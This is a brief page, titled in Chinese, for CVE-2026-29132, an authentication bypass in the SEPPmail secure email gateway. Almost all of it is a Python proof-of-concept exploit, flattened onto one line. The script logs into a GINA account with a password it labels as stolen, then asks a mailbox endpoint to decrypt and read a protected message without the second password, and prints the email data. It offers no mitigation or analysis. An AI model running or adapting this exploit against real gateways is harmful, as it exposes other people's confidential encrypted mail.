CVE-2026-29132 SEPPmail邮件网关认证绕过漏洞

import requests # POC for CVE-2026-29132: SEPPmail Secure Email Gateway Second-Password Bypass TARGET_URL = "https://target-seppmail-domain.com" VICTIM_USER = "[email protected]" GINA_PASS = "stolen_gina_password" session = requests.Session() # Step 1: Authenticate using the GINA account login_data = { "username": VICTIM_USER, "password": GINA_PASS } login_resp = session.post(f"{TARGET_URL}/api/login", json=login_data) if login_resp.status_code == 200: print("[+] GINA Login successful.") # Step 2: Attempt to read protected email without second password # Exploit: The endpoint does not validate the 'second_password' field email_payload = { "email_id": "protected_msg_123", "action": "decrypt_and_read" # Note: 'second_password' is intentionally omitted to trigger the bypass } read_resp = session.post(f"{TARGET_URL}/api/mailbox/read", json=email_payload) if read_resp.status_code == 200 and "content" in read_resp.text: print("[!] Vulnerability Confirmed: Second password bypassed.") print(f"[+] Email Data: {read_resp.text}") else: print("[-] Exploit failed.") else: print("[-] GINA Login failed.")